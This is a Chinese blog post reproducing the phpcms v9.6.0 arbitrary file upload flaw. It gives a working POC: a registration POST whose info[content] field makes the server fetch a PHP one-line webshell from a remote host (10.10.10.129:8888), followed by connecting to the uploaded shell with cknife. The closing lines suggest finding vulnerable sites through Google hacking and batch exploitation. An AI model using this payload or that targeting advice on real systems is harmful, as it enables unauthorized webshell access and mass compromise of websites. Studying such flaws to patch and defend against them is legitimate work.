斗哥说|phpcms_v9.6.0 任意文件上传漏洞复现！

前言

在开启严肃认真的知识分享前，斗哥跟大家说一件严肃的事儿！本周日是一年一度的母亲节！无论你身处他乡还是奔波忙碌，别忘了给亲爱的母上大人送上节日的祝福，家永远是避风的港湾。好啦！煽情结束！

本周斗哥给大家带来了4月份爆出phpcms v9.6.0的漏洞之一，允许上传任意文件，可直接利用该漏洞getShell，这个漏洞利用过程还是比较简单和直接的，接下来复现下这个漏洞。

基础环境

1.phpcms_v9.6.0源码。

2.web应用环境用于搭建phpcms。

3.web应用服务器用于下载木马文件。

需要工具

1.BurpSuite 或者hackBar等。

2.PHPStudy或者wamp等。

源码部署过程

我是在本地使用phpStudy _Apache+MySQL的web应用环境将源码部署在本机的。

1. 0x01 解压phpcms_v9.6.0源码文件，将源码放在www目录下。

2.0x02 启动phpstudy，然后访问本地http://127.0.0.1/phpcms/地址。

3.0x03 安装完成后访问首页，可以正常访问便是安装成功。http://127.0.0.1/phpcms/index.php。

漏洞复现过程

1. 0x01 按照常规的源码部署流程先将phpcms_v9.6.0部署到web环境中，部署完成后访问注册模块。

2. 0x02在会员注册模块中填写注册信息，并使用burpSuite抓包发送到repeater中并修改POST请求的参数值为以下内容：

siteid=1&modelid=11&username=thinking1&password=thinking1&email=thinking1@qq.com&info[content]=<img src=http://10.10.10.129:8888/cus.php#.jpg>&dosubmit=1&protocol=

info[content]中用img标签写入远程主机上的PHP一句话木马并使用#对后面的.jpg进行截断。

也可以直接使用hackbar使用POST请求提交以下的POC

Request：http://xxx.xxx.xxx/phpcms/index.php?m=member&c=index&a=register&siteid=1

[POST DATA]

siteid=1&modelid=11&username=thinking1&password=thinking1&email=thinking1@qq.com&info[content]=<img src=http://10.10.10.129:8888/cus.php#.jpg>&dosubmit=1&protocol=

3. 0x03 修改好后发送改请求包可在响应包中获得上传成功的一句话木马地址:

http://xxx.xxxx.xxx/phpcms/uploadfile/2017/0511/20170511024349903.php

4. 0x04 使用cknife连接一句一句话木马，便成功获得到了网站的webShell了。

总结：稍稍看了下，这个footer搞不好可以进行GoogleHacking 一波，而且整个漏洞的利用属于较简单的，具体怎么进行批量大家可以用多多思考下：）